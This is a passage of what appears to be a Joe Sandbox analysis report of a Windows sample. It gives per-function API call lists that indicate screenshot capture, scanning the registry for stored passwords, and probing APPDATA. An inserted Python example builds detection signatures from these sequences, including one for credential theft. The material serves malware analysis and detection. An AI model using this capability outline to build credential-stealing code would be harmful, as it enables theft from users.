                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$AllocLocal
                                    • String ID: ERROR
                                    • API String ID: 1803462166-2861137601
                                    • Opcode ID: 0597556af163a3ee07472be7ed9431790e0c8966e12f71cd82830d3dd9ab9485
                                    • Instruction ID: ce37fe1d091d9a13d4d82513b5f0d9c8e1fb7690b3bfeb5d6cbe7ac6f07671bb
                                    • Opcode Fuzzy Hash: 0597556af163a3ee07472be7ed9431790e0c8966e12f71cd82830d3dd9ab9485
                                    • Instruction Fuzzy Hash: 1C517B31A112169FCB21AFBCDC49AFE77E5EF55700F054979F84A9B622EA30DC018B91
                                    APIs
                                    • GetEnvironmentVariableA.KERNEL32(00E68A10,002D9BD8,0000FFFF), ref: 000AA026
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AA053
                                    • lstrlen.KERNEL32(002D9BD8), ref: 000AA060
                                    • lstrcpy.KERNEL32(00000000,002D9BD8), ref: 000AA08A
                                    • lstrlen.KERNEL32(000D4C4C), ref: 000AA095
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AA0B2
                                    • lstrcat.KERNEL32(00000000,000D4C4C), ref: 000AA0BE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AA0E4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000AA0EF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AA114
                                    • SetEnvironmentVariableA.KERNEL32(00E68A10,00000000), ref: 000AA12F
                                    • LoadLibraryA.KERNEL32(00E6D408), ref: 000AA143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                    • String ID:
                                    • API String ID: 2929475105-0
                                    • Opcode ID: 52ceef3de404ad5e8dac724f95eb8300ef1dbbd2811698eebe34311e12b8a8ed
                                    • Instruction ID: 85a3539d61ea2e32b6326c8be3f158267c89a3f7d41dea0749b9f174d8341a7f
                                    • Opcode Fuzzy Hash: 52ceef3de404ad5e8dac724f95eb8300ef1dbbd2811698eebe34311e12b8a8ed
                                    • Instruction Fuzzy Hash: AB91BF31F01A009FD7709FE8EC48AA637E5AB57704F40412AF5058B6A2EFB5DD80CB82
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BC8A2
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000BC8D1
                                    • lstrlen.KERNEL32(00000000), ref: 000BC8FC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000BC932
                                    • StrCmpCA.SHLWAPI(00000000,000D4C3C), ref: 000BC943
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 46ffd5308bdc7f6fcef18c8160a70673c8b23976c4c77f2f058648a827321c83
                                    • Instruction ID: 996bf4c3197cf6323e1d0dd1b427973478d12aeba846f39f771e4e6de1898620
                                    • Opcode Fuzzy Hash: 46ffd5308bdc7f6fcef18c8160a70673c8b23976c4c77f2f058648a827321c83
                                    • Instruction Fuzzy Hash: A261C271E122199BEB10EFB4DC48EEE7BF8AF05704F04416AE845E7212DB349D018BA1
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,000C0CF0), ref: 000C4276
                                    • GetDesktopWindow.USER32 ref: 000C4280
                                    • GetWindowRect.USER32(00000000,?), ref: 000C428D
                                    • SelectObject.GDI32(00000000,00000000), ref: 000C42BF
                                    • GetHGlobalFromStream.COMBASE(000C0CF0,?), ref: 000C4336
                                    • GlobalLock.KERNEL32(?), ref: 000C4340
                                    • GlobalSize.KERNEL32(?), ref: 000C434D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                    • String ID:
                                    • API String ID: 1264946473-0
                                    • Opcode ID: aec2073ff38d037e5ca26dfb3e69f4b7ab8582f1c5b59363524ff08266b3196c
                                    • Instruction ID: ffadfd9a1d74080007f34b768826427d41e262f2d3a3d10868011335538d6440
                                    • Opcode Fuzzy Hash: aec2073ff38d037e5ca26dfb3e69f4b7ab8582f1c5b59363524ff08266b3196c
                                    • Instruction Fuzzy Hash: E2512E75E11208AFDB10DFA4EC89EEEB7B9FF48301F10441AF905A3251DB34AE418BA1
                                    APIs
                                    • lstrcat.KERNEL32(?,00E6E098), ref: 000BE00D
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BE037
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE07D
                                    • lstrcat.KERNEL32(?,?), ref: 000BE098
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0AC
                                    • lstrcat.KERNEL32(?,00E5AFF0), ref: 000BE0C0
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0D4
                                    • lstrcat.KERNEL32(?,00E6D508), ref: 000BE0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000BE126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 4230089145-0
                                    • Opcode ID: 3eabd8a3e49394a866c72becce6956c6971bd116965193e8d13914e5e0a04a7c
                                    • Instruction ID: cda3b1345cc45cc3c33b10b2523136ce077cc6d9e14a41662c260b457ebda2dd
                                    • Opcode Fuzzy Hash: 3eabd8a3e49394a866c72becce6956c6971bd116965193e8d13914e5e0a04a7c
                                    • Instruction Fuzzy Hash: 5B615E71D1111CEBCB65EB68DC48ADDB7B8BF58300F1449A5F60AA3251EB70AF858F90
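                                     The API lists for the screenshot routine at 000C4276 (GetDesktopWindow, GetWindowRect, SelectObject, then GetHGlobalFromStream and GlobalLock to read the encoded image back out of the stream), the routine at 000AA026 that reads an environment variable, rewrites it and only then calls LoadLibraryA, and the routine at 000BE00D that resolves CSIDL 0x1A (APPDATA) with SHGetFolderPathA and probes the resulting path with GetFileAttributesA are each an ordered Win32 sequence a detection engineer can match on. The Python below is an added example, not code from this report or from Joe Sandbox: it parses API lines in the "api.MODULE(args), ref: addr" form this report prints and tags a function by ordered API subsequence, with optional argument constraints (the CSIDL value, the "Password" needle of the registry-scanning subcall 000A77D0 that this report attributes to a later function). The signature names, the include_subcalls option and the SAMPLE data (constructed from the lists in this report and shortened) are this example's own assumptions.

```python
"""Capability tagging over the per-function API lists a Joe Sandbox report prints.
Parses "<api>.<MODULE>(<args>), ref: <addr>" lines and matches ordered API sequences."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One report line; "Part of subcall function X:" marks a call the report attributes to a callee.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple          # argument tokens as printed, e.g. ("00000000", "?")
    ref: int             # call-site address
    subcall: str | None  # callee address when the call comes from a subcall, else None


def parse_api_lines(lines):
    """Parse report lines into ApiCall records, keeping the report's address order."""
    calls = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as "APIs" or "Strings"
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


@dataclass(frozen=True)
class Signature:
    name: str                                          # assumed tag name (example's own)
    sequence: tuple                                    # APIs that must occur in this order
    arg_contains: dict = field(default_factory=dict)   # api -> substring one of its args must contain


# Sequences taken from the function blocks in this report. CSIDL_APPDATA is 0x1A.
SIGNATURES = (
    Signature("screenshot_capture",
              ("GetDesktopWindow", "GetWindowRect", "SelectObject", "GetHGlobalFromStream", "GlobalLock")),
    Signature("env_var_rewrite_before_LoadLibrary",
              ("GetEnvironmentVariableA", "SetEnvironmentVariableA", "LoadLibraryA")),
    Signature("appdata_path_probe", ("SHGetFolderPathA", "GetFileAttributesA"), {"SHGetFolderPathA": "0000001A"}),
    Signature("registry_password_scan", ("RegOpenKeyExA", "RegEnumValueA", "StrStrA"), {"StrStrA": "Password"}),
)


def signature_matches(sig, calls, include_subcalls=True):
    """True when sig.sequence is an ordered subsequence of calls and its argument constraints hold."""
    idx = 0
    for call in calls:
        if idx == len(sig.sequence):
            break
        if call.subcall is not None and not include_subcalls:
            continue
        want = sig.sequence[idx]
        if call.api != want:
            continue
        needle = sig.arg_contains.get(want)
        if needle is not None and not any(needle in a for a in call.args):
            continue  # right API, wrong argument (e.g. a different CSIDL)
        idx += 1
    return idx == len(sig.sequence)


def tag_function(lines, include_subcalls=True):
    calls = parse_api_lines(lines)
    return [s.name for s in SIGNATURES if signature_matches(s, calls, include_subcalls)]


def tag_report(functions):
    """{function_address: [API lines]} -> {function_address: [tags]}."""
    return {addr: tag_function(lines) for addr, lines in functions.items()}


# Constructed sample, shortened from the API lists printed in this report.
SAMPLE = {
    "000C4276": [
        "• CreateStreamOnHGlobal.COMBASE(00000000,00000001,000C0CF0), ref: 000C4276",
        "• GetDesktopWindow.USER32 ref: 000C4280",
        "• GetWindowRect.USER32(00000000,?), ref: 000C428D",
        "• SelectObject.GDI32(00000000,00000000), ref: 000C42BF",
        "• GetHGlobalFromStream.COMBASE(000C0CF0,?), ref: 000C4336",
        "• GlobalLock.KERNEL32(?), ref: 000C4340",
    ],
    "000AA026": [
        "• GetEnvironmentVariableA.KERNEL32(00E68A10,002D9BD8,0000FFFF), ref: 000AA026",
        "• SetEnvironmentVariableA.KERNEL32(00E68A10,00000000), ref: 000AA12F",
        "• LoadLibraryA.KERNEL32(00E6D408), ref: 000AA143",
    ],
    "000BE00D": [
        "• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BE037",
        "• GetFileAttributesA.KERNEL32(00000000), ref: 000BE126",
    ],
    "000A7A90": [
        "  • Part of subcall function 000A77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000A7805",
        "  • Part of subcall function 000A77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?), ref: 000A784A",
        "  • Part of subcall function 000A77D0: StrStrA.SHLWAPI(?,Password), ref: 000A78B8",
        "• lstrcat.KERNEL32(00000000, : ), ref: 000A7ACF",
    ],
    "000ABC1F": [  # plain string building; expected to get no tag
        "• lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ABC1F",
        "• lstrcat.KERNEL32(00000000,00000000), ref: 000ABC84",
    ],
}
```

                                     Calling tag_report(SAMPLE) yields one tag for each of the four capability routines and an empty list for the string-building helper. Ordering matters in the second signature: GetEnvironmentVariableA followed by LoadLibraryA alone is ordinary, but a SetEnvironmentVariableA between the two is what distinguishes rewriting the search environment before a library load. Pass include_subcalls=False to tag only calls made directly by the function rather than those the report attributes to its callees.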
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ABC1F
                                    • lstrlen.KERNEL32(00000000), ref: 000ABC52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ABC7C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ABC84
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ABCAC
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000ABD23
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: bcd038afb967a728345a2ba35327121d75952cc82757d5c25cc20e4eec6bec23
                                    • Instruction ID: 20ae8e78d5457c5479e25938c64c5f1f6b3efba391738bb16ced723d1f3f7e51
                                    • Opcode Fuzzy Hash: bcd038afb967a728345a2ba35327121d75952cc82757d5c25cc20e4eec6bec23
                                    • Instruction Fuzzy Hash: 4FA15030A01205CFCB65DFA8E949AAEB7F1AF46305F18806AF409DB663EB31DC41CB51
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5F2A
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5F49
                                    • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 000C6014
                                    • memmove.MSVCRT(00000000,00000000,?), ref: 000C609F
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C60D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$memmove
                                    • String ID: invalid string position$string too long
                                    • API String ID: 1975243496-4289949731
                                    • Opcode ID: be30719a393dbae534e0f7a8a7d3f9c84aeb9dbf5afad428d0db3de9eac2e87a
                                    • Instruction ID: 928cb8dce99c84cce018dd51a83e855d93c0b8a0f63a0d2fadd0e1c22b06221d
                                    • Opcode Fuzzy Hash: be30719a393dbae534e0f7a8a7d3f9c84aeb9dbf5afad428d0db3de9eac2e87a
                                    • Instruction Fuzzy Hash: 4D617B70700604DBDB28CF5CCC95E6EB3B6EF85305B344A2DE4929B782D732AD818B95
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE07D
                                    • lstrcat.KERNEL32(?,?), ref: 000BE098
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0AC
                                    • lstrcat.KERNEL32(?,00E5AFF0), ref: 000BE0C0
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0D4
                                    • lstrcat.KERNEL32(?,00E6D508), ref: 000BE0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000BE126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                    • String ID:
                                    • API String ID: 3428472996-0
                                    • Opcode ID: 08a93092f407a9ef3d74fe77f5a3fee0f9ffd80cab6bee79ea5dd7448ca19631
                                    • Instruction ID: d36d008a460d35d0aadabd298e9311f4fd950a0836094c4aeed4c8f722b2c2eb
                                    • Opcode Fuzzy Hash: 08a93092f407a9ef3d74fe77f5a3fee0f9ffd80cab6bee79ea5dd7448ca19631
                                    • Instruction Fuzzy Hash: FB418D71D11118EBCB65EBA8EC49ADD73B4BF58300F1449A5F90A93252EB309F858F91
                                    APIs
                                      • Part of subcall function 000A77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000A7805
                                      • Part of subcall function 000A77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 000A784A
                                      • Part of subcall function 000A77D0: StrStrA.SHLWAPI(?,Password), ref: 000A78B8
                                      • Part of subcall function 000A77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000A78EC
                                      • Part of subcall function 000A77D0: HeapFree.KERNEL32(00000000), ref: 000A78F3
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000A7A90
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A7ABD
                                    • lstrcat.KERNEL32(00000000, : ), ref: 000A7ACF
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A7AF0
                                    • wsprintfA.USER32 ref: 000A7B10
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A7B39
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A7B47
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000A7B60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Yara matches
                                    Similarity
